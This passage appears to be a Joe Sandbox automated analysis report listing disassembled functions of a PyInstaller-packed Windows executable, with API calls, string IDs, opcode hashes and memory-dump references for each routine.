                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                          • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                          • Instruction ID: 21b74e916b27418404fe74aa6627861027182ab41e33872d9d8cc34c75cae120
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B031C522B1AE42D1EF55AB0AA800175A394FF89BB4F894535DD6D06384EFBCE858C220
                                                                                                                                                                                                                                          Function 00007FF7124F6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                          • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                          • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                          • Instruction ID: 6b512ee778843bde89a94887bd7764f28a15c249cf3df864ed2e555e5212250d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E413D31A18E8691EB15FB28E4542E9A351FB843A4FC00132DE5D476D9EFBCE92DC760
                                                                                                                                                                                                                                          Function 00007FF7124F2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7124F351A,?,00000000,00007FF7124F3F23), ref: 00007FF7124F2AA0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                          • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                          • Instruction ID: c643a0567f9c9643c88a0816ccaaee18e90eefa390949f3fd7f875aa97d2cc22
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90218332B18B8242E720EF55F8817E6A394FB887A4F800135EE8D53659EFBCD559C750
                                                                                                                                                                                                                                          Function 00007FF71250B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                          • Instruction ID: db0dac8f73c9304e07e878e2cc59948026681ca693816903a774b05ce6441347
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33212F20F0CE4282F9587F215DD2539E2525F547B0F9447B4D97E46AC6FDACB848C324
                                                                                                                                                                                                                                          Function 00007FF712517D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                          • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                          • Instruction ID: b473c2e42265a1ec0e39c6afdaa190d8e53b272954281e8a59005a7caed20ed7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C119331B18E4186E750AF56E894329A2A0FB88BF4F800274EA5D877D4DFBCD818C750
                                                                                                                                                                                                                                          Function 00007FF7124F8ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F8EFD
                                                                                                                                                                                                                                          • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F8F5A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7124F45F4,00000000,00007FF7124F1985), ref: 00007FF7124F93C9
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F8FE5
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F9044
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F9055
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7124F3FB1), ref: 00007FF7124F906A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3462794448-0
                                                                                                                                                                                                                                          • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                          • Instruction ID: adc8a6e3b0a417fa0577f98e56296bbd16abbb8057d9067e75fff557273daad3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3241C875B19A8285EB30AF15A4402BAB394FBC4BE0F850135DF4D57B89DEBCD918CB24
                                                                                                                                                                                                                                          Function 00007FF71250B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B2D7
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B30D
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B33A
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B34B
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B35C
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A,?,?,?,?,00007FF71250718F), ref: 00007FF71250B377
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                          • Instruction ID: 7508107a6a5dc49e32579bebfac56a9a621a103675e84c99e32a3954be5bc991
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82116D20B1CE4282FA58BF215AD117DE1429F447B0FA447B4D92E466D6FEACB409C324
                                                                                                                                                                                                                                          Function 00007FF7124F2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7124F1B6A), ref: 00007FF7124F295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                          • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                          • Instruction ID: f6127dcb412cba6335e87c5195d0f68a6203cea994bd1cb8983ac490586f04fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631C722B18A8152E710BB65A8816E7A295BFC87F8F800131EE8D83755EFBCD55AC610
                                                                                                                                                                                                                                          Function 00007FF7124F2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                          • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                          • Instruction ID: b1cbeaba42348124522203c7b92dd1bdc309ccd5032514b0233f9594a50995f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD318832A19E8185E724EF21E8951F9A360FF887A4F840135EE4D47B59DFBCD109C714
                                                                                                                                                                                                                                          Function 00007FF7124F2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7124F918F,?,00007FF7124F3C55), ref: 00007FF7124F2BA0
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF7124F2C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                          • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                          • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                          • Instruction ID: cba7b91b10c78df430e1eacb77bafa8c185751a48a2d9d25eeb7d5bc6aee0c6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D21A162708F4182E710EF18F8857AAB3A4FB88794F804136EE8D57655EE7CD619C750
                                                                                                                                                                                                                                          Function 00007FF7124F2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7124F1B99), ref: 00007FF7124F2760
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                          • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                          • Instruction ID: 7a1640d3e03f624ac5e68d2ea6d5e2109b7fcc792f90faae1092cb064d976594
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021AE32B18B8282E720EB54F8817E6A394FB883A4F800135EE8C43659EFBCD559C750
                                                                                                                                                                                                                                          Function 00007FF712509A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                          • Instruction ID: c14dcc6795daae549167b9c5baa04d6161f72c93a423038632624815945f910e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73F04461B19F0681EB10AF25A8D53759330AF457B1F940279D56E451E4EFACD54CC320
                                                                                                                                                                                                                                          Function 00007FF712519368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction ID: 6cd900eea8c9c0958a777e5466238cdc2cb603c066f16d74dbd2e8e991d731ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD118222F6CE0301FA643965E4D237D9070BF59370FC806B4EA6E172D68EEC684EC121
                                                                                                                                                                                                                                          Function 00007FF71250B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3AF
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF71250A5A3,?,?,00000000,00007FF71250A83E,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250B3CE
